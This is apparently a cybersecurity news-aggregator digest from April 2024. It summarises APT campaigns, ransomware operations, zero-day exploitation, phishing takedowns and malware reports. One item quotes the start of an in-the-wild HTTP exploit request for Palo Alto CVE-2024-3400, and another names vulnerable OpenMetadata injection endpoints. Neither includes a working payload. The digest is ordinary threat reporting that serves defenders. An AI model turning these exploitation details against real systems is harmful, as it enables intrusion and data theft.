          Russian Hacker Group ToddyCat Uses Advanced Tools for Industrial-Scale Data Theft

          industry rusia-ucrania
          2024-04-22 https://thehackernews.com/2024/04/russian-hacker-group-toddycat-uses.html
          The threat actor known as ToddyCat has been observed using a wide range of tools to retain access to compromised environments and steal valuable data. Russian cybersecurity firm Kaspersky characterized the adversary as relying on various programs to harvest data on an "industrial scale" from primarily governmental organizations, some of them defense related, located in


          EU may suspend money-for-views TikTok feature

          financial
          2024-04-22 https://www.bbc.com/news/articles/c9ez1zzmmjzo
          The feature, which pays users to go on TikTok, could be temporarily suspended as early as Thursday.


          Microsoft: APT28 hackers exploit Windows flaw reported by NSA

          exploits
          2024-04-22 https://www.bleepingcomputer.com/news/security/microsoft-apt28-hackers-exploit-windows-flaw-reported-by-nsa/
          Microsoft warns that the Russian APT28 threat group exploits a Windows Print Spooler vulnerability to escalate privileges and steal credentials and data using a previously unknown hacking tool called GooseEgg. [...]


          Microsoft: APT28 hackers exploit Windows flaw reported by NSA

          exploits
          2024-04-22 https://www.bleepingcomputer.com/news/security/microsoft-russian-apt28-hackers-exploit-windows-flaw-reported-by-nsa-using-gooseegg-tool/
          Microsoft warns that the Russian APT28 threat group exploits a Windows Print Spooler vulnerability to escalate privileges and steal credentials and data using a previously unknown hacking tool called GooseEgg. [...]


          Russia-linked APT28 used post-compromise tool GooseEgg to exploit CVE-2022-38028 Windows flaw

          exploits
          2024-04-22 https://securityaffairs.com/162154/apt/apt28-gooseegg-tool-win-bug.html
          Russia-linked APT28 group used a previously unknown tool, dubbed GooseEgg, to exploit a Windows Print Spooler service flaw. Microsoft reported that the Russia-linked APT28 group (aka “Forest Blizzard”, “Fancybear” or “Strontium”) used a previously unknown tool, dubbed GooseEgg, to exploit the Windows Print Spooler flaw CVE-2022-38028. Since at least June 2020, and possibly earlier, the cyberespionage […]

          Autosummary: The APT28 group (aka Forest Blizzard, Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and has targeted governments, militaries, and security organizations worldwide.


          Ransomware payments drop to record low of 28% in Q1 2024

          exploits
          2024-04-21 https://www.bleepingcomputer.com/news/security/ransomware-payments-drop-to-record-low-of-28-percent-in-q1-2024/
          Ransomware actors have had a rough start this year, as stats from cybersecurity firm Coveware show that the trend of victims declining to pay the cybercriminals continues and has now reached a new record low of 28%. [...]

          Autosummary: Of the attack vectors that have been determined, remote access and vulnerability exploitation play the largest role, with the CVE-2023-20269, CVE-2023-4966, and CVE-2024-1708-9 flaws being the most widely exploited in Q1 by ransomware operators.


          Malware dev lures child exploiters into honeytrap to extort them

          exploits
          2024-04-21 https://www.bleepingcomputer.com/news/security/malware-dev-lures-child-exploiters-into-honeytrap-to-extort-them/
          You rarely root for a cybercriminal, but a new malware campaign targeting child exploiters doesn’t make you feel bad for the victims. [...]

          Autosummary: Clicking on the "Download & Install" button on the fake UsenetClub site will download a CryptVPN.zip file that, when extracted, contains a Windows shortcut called "CLICK-HERE-TO-INSTALL".


          Akira ransomware received $42M in ransom payments from over 250 victims

          exploits ransomware
          2024-04-21 https://securityaffairs.com/162098/cyber-crime/akira-ransomware-report-fbi.html
          Government agencies revealed that Akira ransomware has breached over 250 entities worldwide and received over $42 million in ransom payments. A joint advisory published by CISA, the FBI, Europol, and the Netherlands’ National Cyber Security Centre (NCSC-NL) revealed that since early 2023, Akira ransomware operators received $42 million in ransom payments from more than 250 […]


          How Chinese firms are using Mexico as a backdoor to the US

          latam
          2024-04-21 https://www.bbc.co.uk/news/business-68825118
          Chinese firms are racing to set up factories in Mexico to bypass US tariffs and sanctions.


          Critical Update: CrushFTP Zero-Day Flaw Exploited in Targeted Attacks

          exploits
          2024-04-20 https://thehackernews.com/2024/04/critical-update-crushftp-zero-day-flaw.html
          Users of the CrushFTP enterprise file transfer software are being urged to update to the latest version following the discovery of a security flaw that has come under targeted exploitation in the wild. "CrushFTP v11 versions below 11.1 have a vulnerability where users can escape their VFS and download system files," CrushFTP said in an advisory released Friday.


          A French hospital was forced to reschedule procedures after cyberattack

          ciber
          2024-04-20 https://securityaffairs.com/162057/hacking/french-hospital-cyber-attack.html
          A French hospital was forced to return to pen and paper and postpone medical treatments after a cyber attack. A cyber attack hit Hospital Simone Veil in Cannes (CHC-SV) on Tuesday, impacting medical procedures and forcing personnel to return to pen and paper. The Hospital Simone Veil in Cannes is a public hospital located in Cannes, France. The […]

          Autosummary: Pierluigi Paganini, April 20, 2024. The hospital ensured continuity of operations in emergency care, internal medicine, surgery, obstetrics, geriatrics, pediatrics, psychiatry, home hospitalization, and rehabilitation.


          GitHub comments abused to push malware via Microsoft repo URLs

          exploits
          2024-04-20 https://www.bleepingcomputer.com/news/security/github-comments-abused-to-push-malware-via-microsoft-repo-urls/
          A GitHub flaw, or possibly a design decision, is being abused by threat actors to distribute malware using URLs associated with a Microsoft repository, making the files appear trustworthy. [...]

          Autosummary: “GitHub bug still dropping malware” (pic.twitter.com/s165zOAsoI), herrcore (@herrcore) posted on March 27, 2024. As part of our research into this bug, BleepingComputer could only find one other repo, httprouter, abused to distribute malware in this way, and it was the same "Cheater.Pro.1.6.0.zip" as seen in Microsoft’s URLs.


          Critical CrushFTP zero-day exploited in attacks in the wild

          exploits
          2024-04-20 https://securityaffairs.com/162067/hacking/crushftp-zero-day-exploited.html
          Threat actors exploited a critical zero-day vulnerability in the CrushFTP enterprise file transfer software in targeted attacks, CrowdStrike experts warn. CrushFTP is a file transfer server that enables secure and efficient file transfer capabilities. It supports various features such as FTP, SFTP, FTPS, HTTP, HTTPS, WebDAV, and WebDAV SSL protocols, allowing users to transfer files securely over […]

          Autosummary: Pierluigi Paganini, April 20, 2024. Threat actors exploited a critical zero-day vulnerability in the CrushFTP enterprise file transfer software in targeted attacks, CrowdStrike experts warn.


          Fake cheat lures gamers into spreading infostealer malware

          exploits
          2024-04-19 https://www.bleepingcomputer.com/news/security/fake-cheat-lures-gamers-into-spreading-infostealer-malware/
          A new info-stealing malware linked to Redline poses as a game cheat called "Cheat Lab," promising downloaders a free copy if they convince their friends to install it too. [...]

          Autosummary: Redline is a powerful information-stealing malware capable of harvesting sensitive information from infected computers, including passwords, cookies, autofill information, and cryptocurrency wallet information.


          Hackers Target Middle East Governments with Evasive "CR4T" Backdoor

          government
          2024-04-19 https://thehackernews.com/2024/04/hackers-target-middle-east-governments.html
          Government entities in the Middle East have been targeted as part of a previously undocumented campaign to deliver a new backdoor dubbed CR4T. Russian cybersecurity company Kaspersky said it discovered the activity in February 2024, with evidence suggesting that it may have been active since at least a year prior. The campaign has been codenamed

          Autosummary: CR4T ("CR4T.pdb") is a C/C++-based memory-only implant that grants attackers access to a console for command line execution on the infected machine, performs file operations, and uploads and downloads files after contacting the C2 server.


          United Nations Development Programme (UNDP) investigates data breach

          financial
          2024-04-19 https://securityaffairs.com/162025/cyber-crime/undp-investigates-data-breach.html
          The United Nations Development Programme (UNDP) has initiated an investigation into an alleged ransomware attack and the subsequent theft of data. UNDP is a United Nations agency tasked with helping countries eliminate poverty and achieve sustainable economic growth and human development. The […]

          Autosummary: Pierluigi Paganini, April 19, 2024. The United Nations Development Programme (UNDP) has initiated an investigation into an alleged ransomware attack and the subsequent theft of data.


          LastPass users targeted by vishing attackers

          financial
          2024-04-19 https://www.helpnetsecurity.com/2024/04/19/lastpass-vishing/

          The CryptoChameleon phishing kit is being leveraged by vishing attackers looking to trick LastPass users into sharing their master password. “Initially, we learned of a new parked domain (help-lastpass[.]com) and immediately marked the website for monitoring should it go live and start serving a phishing site intended to imitate our login page or something similar. Once we identified that this site went active and was being used in a phishing campaign against our customers, we … More

          The post LastPass users targeted by vishing attackers appeared first on Help Net Security.

Autosummary: According to Lookout researchers, the phishing kit is capable of replicating login pages of popular cryptocurrency exchanges and other services (Binance, Coinbase, Gemini, Kraken, Trezor, etc.) and email, password management, and single sign-on (SSO) services such as Gmail, Outlook, iCloud, AOL, LastPass, Okta, and others.


          Akira Ransomware Gang Extorts $42 Million; Now Targets Linux Servers

          exploits ransomware Linux
          2024-04-19 https://thehackernews.com/2024/04/akira-ransomware-gang-extorts-42.html
Threat actors behind the Akira ransomware group have extorted approximately $42 million in illicit proceeds after breaching the networks of more than 250 victims as of January 1, 2024. "Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia," cybersecurity agencies from the Netherlands and the U.S.,

Autosummary: "Away from the complex infrastructure of modern ransomware, junk-gun ransomware allows criminals to get in on the action cheaply, easily, and independently," Sophos said, describing it as a "relatively new phenomenon" that further lowers the cost of entry. "Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia," cybersecurity agencies from the Netherlands and the U.S., along with Europol's European Cybercrime Centre (EC3), said in a joint alert.


          Ransomware in Q1 2024: Frequency, size of payments trending downwards, SMBs beware!

          exploits
          2024-04-19 https://www.helpnetsecurity.com/2024/04/19/ransomware-q1-2024-payments/

          More organizations hit by ransomware gangs are starting to realize that it doesn’t pay to pay up: “In Q1 2024, the proportion of victims that chose to pay touched a new record low of 28%,” ransomware incident response firm Coveware has found. Victim organizations are increasingly able to withstand an encryption attack and restore operations without the need for a decryption key, they said, and the stolen data is often leaked or traded even after … More

          The post Ransomware in Q1 2024: Frequency, size of payments trending downwards, SMBs beware! appeared first on Help Net Security.


          HelloKitty ransomware rebrands, releases CD Projekt and Cisco data

          exploits ransomware
          2024-04-19 https://www.bleepingcomputer.com/news/security/hellokitty-ransomware-rebrands-releases-cd-projekt-and-cisco-data/
An operator of the HelloKitty ransomware operation announced they changed the name to "HelloGookie," releasing passwords for previously leaked CD Projekt source code, Cisco network information, and decryption keys from old attacks. [...]

Autosummary: To celebrate the launch, the threat actor released four private decryption keys that can be used to decrypt files in older attacks, as well as internal information stolen from Cisco in a 2022 attack and passwords for the leaked source code for Gwent, Witcher 3, and Red Engine stolen from CD Projekt in 2021.


          MITRE says state hackers breached its network via Ivanti zero-days

          exploits government
          2024-04-19 https://www.bleepingcomputer.com/news/security/mitre-says-state-hackers-breached-its-network-via-ivanti-zero-days/
The MITRE Corporation says a state-backed hacking group breached its systems in January 2024 by chaining two Ivanti VPN zero-days. [...]


          United Nations agency investigates ransomware attack, data theft

          exploits ransomware
          2024-04-19 https://www.bleepingcomputer.com/news/security/united-nations-agency-investigates-ransomware-attack-claimed-by-8Base-gang/
The United Nations Development Programme (UNDP) is investigating a cyberattack after threat actors breached its IT systems to steal human resources data. [...]

Autosummary: UNDP entry on 8Base's leak site (BleepingComputer). The files they temporarily leaked via a now-expired link allegedly include "a huge amount of confidential information," personal data, accounting data, certificates, employment contracts, confidentiality agreements, invoices, receipts, and more.


          The Week in Ransomware - April 19th 2024 - Attacks Ramp Up

          exploits ransomware
          2024-04-19 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-19th-2024-attacks-ramp-up/
While ransomware attacks decreased after the LockBit and BlackCat disruptions, they have once again started to ramp up with other operations filling the void. [...]

Autosummary: Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @BleepinComputer, @Ionut_Ilascu, @serghei, @fwosar, @LawrenceAbrams, @malwrhunterteam, @demonslay335, @Seifreed, @pcrisk, @SophosXOps, @jgreigj, @JessicaHrdcstle, @3xp0rtblog, @AShukuhi, and @vxunderground. A Sophos X-Ops investigation finds that a wave of crude, cheap ransomware could spell trouble for small businesses and individuals – but also provide insights into threat actor career development and the wider threat landscape. April 18th 2024: According to a joint advisory from the FBI, CISA, Europol's European Cybercrime Centre (EC3), and the Netherlands' National Cyber Security Centre (NCSC-NL), the Akira ransomware operation has breached the networks of over 250 organizations and raked in roughly $42 million in ransom payments.


          CrushFTP warns users to patch exploited zero-day “immediately”

          exploits
          2024-04-19 https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/
CrushFTP warned customers today in a private memo of an actively exploited zero-day vulnerability fixed in new versions released today, urging them to patch their servers immediately. [...]

Autosummary: Exploited in targeted attacks. Cybersecurity company CrowdStrike also confirmed the vulnerability (which has yet to get a CVE ID assigned) in an intelligence report with more information on the attackers' tactics, techniques, and objectives (TTPs).


          MITRE revealed that nation-state actors breached its systems via Ivanti zero-days

          exploits government
          2024-04-19 https://securityaffairs.com/162045/security/mitre-security-breach-ivanti-zero-days.html
The MITRE Corporation revealed that a nation-state actor compromised its systems in January 2024 by exploiting Ivanti VPN zero-days. In April 2024, MITRE disclosed a security breach in one of its research and prototyping networks. The security team at the organization promptly launched an investigation, logged out the threat actor, and engaged third-party forensics Incident […]

Autosummary: MITRE revealed that nation-state actors breached its systems via Ivanti zero-days. Pierluigi Paganini, April 19, 2024. The MITRE Corporation revealed that a nation-state actor compromised its systems in January 2024 by exploiting Ivanti VPN zero-days.


          Protecting yourself after a medical data breach – Week in security with Tony Anscombe

          financial
          2024-04-19 https://www.welivesecurity.com/en/videos/protecting-yourself-medical-data-breach-week-security-tony-anscombe/
What are the risks and consequences of having your health data exposed and what are the steps to take if it happens to you?


          Extortion and kidnap - a deadly journey across Mexico

          latam
          2024-04-19 https://www.bbc.co.uk/news/world-us-canada-68816029
Under the radar in the US border crisis debate is the role of drug cartels preying on migrants.


          Cheap ransomware for sale on dark web marketplaces is changing the way hackers operate

          exploits ransomware
          2024-04-18 https://www.helpnetsecurity.com/2024/04/18/junk-gun-cheap-ransomware-dark-web/

          Since June 2023, Sophos X-Ops has discovered 19 junk gun ransomware variants — cheap, independently produced, and crudely constructed — on the dark web. The developers of these junk gun variants are attempting to disrupt the traditional affiliate-based ransomware-as-a-service (RaaS) model that has dominated the ransomware racket for nearly a decade. Instead of selling or buying ransomware to or as an affiliate, attackers create and sell unsophisticated variants for a one-time cost—which other attackers sometimes … More

          The post Cheap ransomware for sale on dark web marketplaces is changing the way hackers operate appeared first on Help Net Security.

Autosummary: “Over the past two months, however, some of the biggest players in the ransomware ecosystem have disappeared or shut down, and, in the past, we’ve also seen ransomware affiliates vent their anger over the profit-sharing scheme of RaaS. Nothing within the cybercrime world stays static forever, and these cheap versions of off-the-shelf ransomware may be the next evolution in the ransomware ecosystem—especially for lower-skilled cyber attackers simply looking to make a profit rather than a name for themselves,” Budd concluded.


          Hackers Exploit OpenMetadata Flaws to Mine Crypto on Kubernetes

          exploits
          2024-04-18 https://thehackernews.com/2024/04/hackers-exploit-openmetadata-flaws-to.html
Threat actors are actively exploiting critical vulnerabilities in OpenMetadata to gain unauthorized access to Kubernetes workloads and leverage them for cryptocurrency mining activity. That's according to the Microsoft Threat Intelligence team, which said the flaws have been weaponized since the start of April 2024. OpenMetadata is an open-source platform that operates as a

Autosummary: A Spring Expression Language (SpEL) injection vulnerability in PUT /api/v1/events/subscriptions (fixed in version 1.2.4) (CVSS score: 8.8); CVE-2024-28848 (CVSS score: 8.8) - A SpEL injection vulnerability in GET /api/v1/events/subscriptions/validation/condition/<expr> (fixed in version 1.2.4).


          LabHost phishing service with 40,000 domains disrupted, 37 arrested

          financial
          2024-04-18 https://www.bleepingcomputer.com/news/security/labhost-phishing-service-with-40-000-domains-disrupted-37-arrested/
The LabHost phishing-as-a-service (PhaaS) platform has been disrupted in a year-long global law enforcement operation that compromised the infrastructure and arrested 37 suspects, among them the original developer. [...]

Autosummary: The recent international law enforcement operation coordinated by Europol started roughly a year ago and involved police forces and special investigators in 19 countries, as well as partners from the private sector like Microsoft, Trend Micro, Chainalysis, Intel 471, and The Shadowserver Foundation.


          Cannabis investment scam JuicyFields ends in 9 arrests

          financial
          2024-04-18 https://www.malwarebytes.com/blog/news/2024/04/cannabis-investment-scam-juicyfields-ends-in-9-arrests
JuicyFields was an investment scam that urged victims to invest in cannabis production.

Autosummary: During the investigation and on action day, law enforcement seized or froze € 4,700,000 in bank accounts, € 1,515,000 in cryptocurrencies, € 106,000 in cash and € 2,600,000 in real estate assets, which amounts to roughly $ 9.5 Million in total. So, for example, the first-time investor would deposit € 50 and receive a pay-out doubling their money soon after. Indeed, the U.S., Canada, and the soon-to-be regulated markets of the European Union are spearheading this revolution with unprecedented swiftness.


          Ivanti patches critical Avalanche flaw exploitable via a simple message (CVE-2024-29204)

          exploits
          2024-04-18 https://www.helpnetsecurity.com/2024/04/18/cve-2024-29204/

          The newest version of Ivanti Avalanche – the company’s enterprise mobile device management (MDM) solution – carries fixes for 27 vulnerabilities, two of which (CVE-2024-29204, CVE-2024-24996) are critical and may allow a remote unauthenticated attacker to execute arbitrary commands on the underlying Windows system. “We are not aware of any customers being exploited by these vulnerabilities prior to public disclosure,” the company said on Wednesday. CVE-2024-29204 and CVE-2024-24996 Both critical vulnerabilities are heap overflow bugs: … More

          The post Ivanti patches critical Avalanche flaw exploitable via a simple message (CVE-2024-29204) appeared first on Help Net Security.


          Authorities take down LabHost, phishing-as-a-service platform

          financial
          2024-04-18 https://www.helpnetsecurity.com/2024/04/18/labhost-phishing-platform-taken-down/

Law enforcement from 19 countries severely disrupted one of the world’s largest phishing-as-a-service platforms, known as LabHost. This year-long operation, coordinated at the international level by Europol, resulted in the compromise of LabHost’s infrastructure. International investigation disrupts phishing-as-a-service platform LabHost. Between Sunday 14 April and Wednesday 17 April a total of 70 addresses were searched across the world, resulting in the arrest of 37 suspects. This includes the arrest of 4 individuals in the United … More

          The post Authorities take down LabHost, phishing-as-a-service platform appeared first on Help Net Security.

Autosummary: LabHost: Cybercriminals’ one-stop platform for phishing kits and engagement tools. Cybercrime-as-a-service has become a rapidly growing business model in the criminal landscape whereby threat actors rent or sell tools, expertise, or services to other cybercriminals to commit their attacks.


          Recover from Ransomware in 5 Minutes—We will Teach You How!

          exploits ransomware
          2024-04-18 https://thehackernews.com/2024/04/recover-from-ransomware-in-5-minuteswe.html
Super Low RPO with Continuous Data Protection: Dial Back to Just Seconds Before an Attack. Zerto, a Hewlett Packard Enterprise company, can help you detect and recover from ransomware in near real-time. This solution leverages continuous data protection (CDP) to ensure all workloads have the lowest recovery point objective (RPO) possible. The most valuable thing about CDP is that it does not use

Autosummary: With full automation and orchestration, a Zerto failover can achieve benefits like these: thousands of VMs with an RTO of minutes; full re-IP of each VM, if required; restoring directly onto production-grade storage of your choice with no additional migrations required (such as Storage vMotion); restoring directly back onto production-grade compute without any further steps such as vMotion. This type of recovery is ideal for cyber recovery because large-scale recoveries can be difficult to achieve with backup tools that are not designed for recovery at scale. Real-time, in-line encryption detection helps identify anomalous activity, limit blast radius, and provide the earliest warning signal that an attack may be occurring. You can drill down to see the exact disk the anomalous activity is being generated from, allowing you to quickly identify infected machines, limit blast radius, and create a timeline of events to aid in investigations and forensics post-recovery, as shown in this image.


          New Android Trojan "SoumniBot" Evades Detection with Clever Tricks

          exploits
          2024-04-18 https://thehackernews.com/2024/04/new-android-trojan-soumnibot-evades.html
A new Android trojan called SoumniBot has been detected in the wild targeting users in South Korea by leveraging weaknesses in the manifest extraction and parsing procedure. The malware is "notable for an unconventional approach to evading analysis and detection, namely obfuscation of the Android manifest," Kaspersky researcher Dmitry Kalinin said in a technical analysis.

Autosummary: Secondly, SoumniBot misrepresents the archived manifest file size, providing a value that exceeds the actual figure, as a result of which the "uncompressed" file is directly copied, with the manifest parser ignoring the rest of the "overlay" data that takes up the rest of the available space.


          How to Conduct Advanced Static Analysis in a Malware Sandbox

          exploits
          2024-04-18 https://thehackernews.com/2024/04/how-to-conduct-advanced-static-analysis.html
Sandboxes are synonymous with dynamic malware analysis. They help to execute malicious files in a safe virtual environment and observe their behavior. However, they also offer plenty of value in terms of static analysis. See these five scenarios where a sandbox can prove to be a useful tool in your investigations. Detecting Threats in PDFs: PDF files are frequently exploited by threat actors to

Autosummary: Example: Details of an .eml file static analysis. All content within EMAIL files is extracted and made available through static analysis in the sandbox, allowing users to view details about it even without accessing the VM itself. Example: ZIP file structure displayed in the static analysis window. In ANY.RUN, users can submit files for new analysis directly from archived files from the static discovery window. All embedded files, including images, scripts, and executable files, are also accessible for further analysis. Analyzing Suspicious Office Documents: Microsoft Office documents, such as Word, Excel, and PowerPoint ones, are one of the leading security risks in both corporate and personal settings. It gives you a real-time overview of the network traffic, registry activities, and processes occurring during malware execution, highlighting malicious behavior and the tactics, techniques, and procedures (TTPs).


          Global Police Operation Disrupts "LabHost" Phishing Service, Over 30 Arrested Worldwide

          financial
          2024-04-18 https://thehackernews.com/2024/04/global-police-operation-disrupts.html
As many as 37 individuals have been arrested as part of an international crackdown on a cybercrime service called LabHost that has been used by criminal actors to steal personal credentials from victims around the world. Described as one of the largest Phishing-as-a-Service (PhaaS) providers, LabHost offered phishing pages targeting banks, high-profile organizations, and other service

Autosummary: Described as one of the largest Phishing-as-a-Service (PhaaS) providers, LabHost offered phishing pages targeting banks, high-profile organizations, and other service providers located primarily in Canada, the U.S., and the U.K. As part of the operation, codenamed Nebulae, two LabHost users from Melbourne and Adelaide were arrested on April 17, with three others arrested and charged with drug-related offenses.


          Previously unknown Kapeka backdoor linked to Russian Sandworm APT

          rusia-ucrania
          2024-04-18 https://securityaffairs.com/161987/hacking/kapeka-backdoor-linked-sandworm.html
Russia-linked APT Sandworm has employed a previously undocumented backdoor called Kapeka in attacks against Eastern Europe since 2022. WithSecure researchers identified a new backdoor named Kapeka that has been used in attacks targeting victims in Eastern Europe since at least mid-2022. The backdoor is very sophisticated; it serves as both an initial toolkit and as a backdoor […]

Autosummary: In 2022, the Russian APT used multiple wipers in attacks aimed at Ukraine, including AwfulShred, CaddyWiper, HermeticWiper, Industroyer2, IsaacWiper, WhisperGate, Prestige, RansomBoggs, and ZeroWipe. The Sandworm group (aka BlackEnergy, UAC-0082, Iron Viking, Voodoo Bear, and TeleBots) has been active since 2000 and operates under the control of Unit 74455 of the Russian GRU’s Main Center for Special Technologies (GTsST).


          Cybercriminals pose as LastPass staff to hack password vaults

          ciber
          2024-04-18 https://www.bleepingcomputer.com/news/security/cybercriminals-pose-as-lastpass-staff-to-hack-password-vaults/
LastPass is warning of a malicious campaign targeting its users with the CryptoChameleon phishing kit that is associated with cryptocurrency theft. [...]


          Change Healthcare data for sale on dark web as fallout from ransomware attack spirals out of control

          exploits ransomware
          2024-04-18 https://www.bitdefender.com/blog/hotforsecurity/change-healthcare-data-for-sale-on-dark-web-as-fallout-from-ransomware-attack-spirals-out-of-control/
          February"s crippling ransomware attack against Change Healthcare, which saw prescription orders delayed across the United States, continues to have serious consequences. Read more in my article on the Hot for Security blog. "

          Autosummary: The cybercriminal group RansomHub published a portion of what it claims to be the many millions of patient records it stole in the attack on the dark web, including medical information, insurance records, and billing details. "


          OfflRouter Malware Evades Detection in Ukraine for Almost a Decade

          exploits
          2024-04-18 https://thehackernews.com/2024/04/offlrouter-malware-evades-detection-in.html
Select Ukrainian government networks have remained infected with a malware called OfflRouter since 2015. Cisco Talos said its findings are based on an analysis of over 100 confidential documents that were infected with the VBA macro virus and uploaded to the VirusTotal malware scanning platform. "The documents contained VBA code to drop and run an executable with the name 'ctrlpanel.exe,'"

Autosummary: "The infection iterates through a list of the document candidates to infect and uses an innovative method to check the document infection marker to avoid multiple infection processes – the function checks the document creation metadata, adds the creation times, and checks the value of the sum," Svajcer said.


          FIN7 Cybercrime Group Targeting U.S. Auto Industry with Carbanak Backdoor

          industry
          2024-04-18 https://thehackernews.com/2024/04/fin7-cybercrime-group-targeting-us-auto.html
The infamous cybercrime syndicate known as FIN7 has been linked to a spear-phishing campaign targeting the U.S. automotive industry to deliver a known backdoor called Carbanak (aka Anunak). "FIN7 identified employees at the company who worked in the IT department and had higher levels of administrative rights," the BlackBerry research and intelligence team said in a new write-up. "They


          Law enforcement operation dismantled phishing-as-a-service platform LabHost

          financial
          2024-04-18 https://securityaffairs.com/162001/hacking/labhost-phaas-dismantled.html
An international law enforcement operation led to the disruption of the prominent phishing-as-a-service platform LabHost. An international law enforcement operation, codenamed Nebulae and coordinated by Europol, led to the disruption of LabHost, which is one of the world’s largest phishing-as-a-service platforms. Law enforcement from 19 countries participated in the operation which resulted in the arrest […]

Autosummary: Law enforcement operation dismantled phishing-as-a-service platform LabHost. Pierluigi Paganini, April 18, 2024. An international law enforcement operation led to the disruption of the prominent phishing-as-a-service platform LabHost.


          840-bed hospital in France postpones procedures after cyberattack

          ciber
          2024-04-18 https://www.bleepingcomputer.com/news/security/chc-sv-hospital-in-france-postpones-procedures-after-cyberattack/
The Hospital Simone Veil in Cannes (CHC-SV) has announced that it was targeted by a cyberattack on Tuesday morning, severely impacting its operations and forcing staff to go back to pen and paper. [...]

Autosummary: Emergency, medicine, surgery, obstetrics, geriatrics, pediatrics, psychiatry, home hospitalization, and rehabilitation units continue to operate.


          FBI: Akira ransomware raked in $42 million from 250+ victims

          exploits ransomware
          2024-04-18 https://www.bleepingcomputer.com/news/security/fbi-akira-ransomware-raked-in-42-million-from-250-plus-victims/
According to a joint advisory from the FBI, CISA, Europol's European Cybercrime Centre (EC3), and the Netherlands' National Cyber Security Centre (NCSC-NL), the Akira ransomware operation has breached the networks of over 250 organizations and raked in roughly $42 million in ransom payments. [...]


          Google ad impersonates Whales Market to push wallet drainer malware

          exploits
          2024-04-18 https://www.bleepingcomputer.com/news/security/google-ad-impersonates-whales-market-to-push-wallet-drainer-malware/
A legitimate-looking Google Search advertisement for the crypto trading platform "Whales Market" redirects visitors to a wallet-draining phishing site that steals all of your assets. [...]

Autosummary: Other brands impersonated by legitimate-looking Google ads include KeePass, Home Depot, Amazon, eBay, and even Google's own property, YouTube.


          Law enforcement reels in phishing-as-a-service whopper

          financial
          2024-04-18 https://www.malwarebytes.com/blog/cybercrime/2024/04/law-enforcement-reels-in-phishing-as-a-service-whopper
A major international law enforcement effort has disrupted the notorious LabHost phishing-as-a-service platform.

Autosummary: The UK’s Metropolitan Police (“The Met”), which spearheaded the operation, says it has already contacted the criminals who used the site: Shortly after the platform was disrupted, 800 users received a message telling them we know who they are and what they’ve been doing.


          FIN7 targeted a large U.S. carmaker phishing attacks

          financial
          2024-04-18 https://securityaffairs.com/162014/cyber-crime/fin7-targeted-u-s-carmaker.html
BlackBerry reported that the financially motivated group FIN7 targeted the IT department of a large U.S. carmaker with spear-phishing attacks. In late 2023, BlackBerry researchers spotted the threat actor FIN7 targeting a large US automotive manufacturer with a spear-phishing campaign. FIN7 targeted employees who worked in the company’s IT department and had higher levels of […]

Autosummary: In the attacks analyzed by BlackBerry, threat actors used a typosquatting technique: they used a malicious URL “advanced-ip-sccanner[.]com” masquerading as the legitimate website “advanced-ip-scanner[.]com”, which is a free online scanner.


          Frontier Communications shuts down systems after cyberattack

          ciber
          2024-04-18 https://www.bleepingcomputer.com/news/security/frontier-communications-shuts-down-systems-after-cyberattack/
American telecom provider Frontier Communications is restoring systems after a cybercrime group breached some of its IT systems in a recent cyberattack. [...]

Autosummary: According to an internal memo, a network outage took down Frontier's wholesale sites on Tuesday morning at around 7:30 AM ET, as well as the following applications and platforms: Virtual Front Office (VFO) Local (LSR/ISP) Module; Virtual Front Office (VFO) Access (ASR) Module; Virtual Front Office (VFO) Trouble Administration (TA).


          Cybersecurity jobs available right now: April 17, 2024

          ciber
          2024-04-17 https://www.helpnetsecurity.com/2024/04/17/cybersecurity-jobs-available-right-now-april-17-2024/

Client Security Officer, Unisys | USA | Remote. The Client Security Officer (CSO) is part of Unisys account management team servicing its clients as cybersecurity representative alongside the Client Executive and the Client Delivery Executive. Cybersecurity Engineer, Fujitsu | Singapore | Hybrid. As a member of the Fujitsu Security Team, you will implement security solutions for customers to address cyber threats and potential vulnerabilities. This person will … More

          The post Cybersecurity jobs available right now: April 17, 2024 appeared first on Help Net Security.

Autosummary: Manager, IT Security Operations, Dalhousie University | Canada | On-site. Reporting to the Associate Director of Engineering Services, the Manager, Security Operations is responsible for the projects and activities to address new and emerging requirements for security operations, including network security, application security, end user device security and Identity and Access management.


          Researchers released exploit code for actively exploited Palo Alto PAN-OS bug

          exploits
          2024-04-17 https://securityaffairs.com/161936/hacking/exploit-code-cve-2024-3400-palo-alto-pan-os.html
Researchers released an exploit code for the actively exploited vulnerability CVE-2024-3400 in Palo Alto Networks’ PAN-OS. Researchers at watchTowr Labs have released a technical analysis of the vulnerability CVE-2024-3400 in Palo Alto Networks’ PAN-OS and a proof-of-concept exploit that can be used to execute shell commands on vulnerable firewalls. CVE-2024-3400 (CVSS score of 10.0) is a […]

Autosummary: "Since it's out there now this is what I caught in wild CVE-2024-3400: GET /global-protect/login.esp HTTP/1.1 Host: X User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept-Encoding: gzip, deflate, br…" — Justin Elze (@HackingLZ) April 16, 2024. This week, US CISA added the vulnerability CVE-2024-3400 to its Known Exploited Vulnerabilities (KEV) catalog, ordering U.S. federal agencies to address it by April 19th.


          Palo Alto firewalls: Public exploits, rising attacks, ineffective mitigation

          exploits
          2024-04-17 https://www.helpnetsecurity.com/2024/04/17/cve-2024-3400-attacks/

          While it initially seemed that protecting Palo Alto Network firewalls from attacks leveraging CVE-2024-3400 would be possible by disabling the devices’ telemetry, it has now been confirmed that this mitigation is ineffectual. “Device telemetry does not need to be enabled for PAN-OS firewalls to be exposed to attacks related to this vulnerability,” Palo Alto Networks noted on Tuesday, and said they are aware of an “increasing number of attacks that leverage the exploitation of this … More

          The post Palo Alto firewalls: Public exploits, rising attacks, ineffective mitigation appeared first on Help Net Security.

          "

          Autosummary: "


          Critical Atlassian Flaw Exploited to Deploy Linux Variant of Cerber Ransomware

          exploits ransomware Linux
          2024-04-17 https://thehackernews.com/2024/04/critical-atlassian-flaw-exploited-to.html
